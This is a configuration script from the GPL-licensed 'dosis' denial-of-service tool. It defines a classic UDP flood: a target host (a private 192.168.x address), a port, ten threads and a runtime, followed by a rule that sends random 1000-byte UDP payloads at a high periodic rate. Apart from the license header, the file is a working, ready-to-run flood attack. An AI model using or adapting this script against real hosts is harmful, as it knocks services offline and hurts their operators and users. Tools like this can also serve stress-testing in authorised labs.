###############################################################################
# udpflood.inj
#
# Classic udp flood.
#
# Configuration:
#  THOST   - target host
#  TPORT   - target port
#  THREADS - number of threads
#  RT      - total runtime (in seconds)
#
# -----------------------------------------------------------------------------
# dosis - DoS: Internet Sodomizer
#   (C) 2008-2009 Gerardo García Peña <gerardo@kung-foo.dhs.org>
#
#   This program is free software; you can redistribute it and/or modify it
#   under the terms of the GNU General Public License as published by the Free
#   Software Foundation; either version 2 of the License, or (at your option)
#   any later version.
#
#   This program is distributed in the hope that it will be useful, but WITHOUT
#   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
#   FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
#   more details.
#
#   You should have received a copy of the GNU General Public License along
#   with this program; if not, write to the Free Software Foundation, Inc., 51
#   Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
#
###############################################################################

# configuration
#THOST="127.0.0.1"
THOST="192.168.2.1"
TPORT="9999"
THREADS="10"
RT="5.0"

# script
0.0 ON [1%$THREADS] UDP DST $THOST $TPORT PAYLOAD RANDOM(1000) PERIODIC [ 0.0, 1048576 ]
$RT OFF *

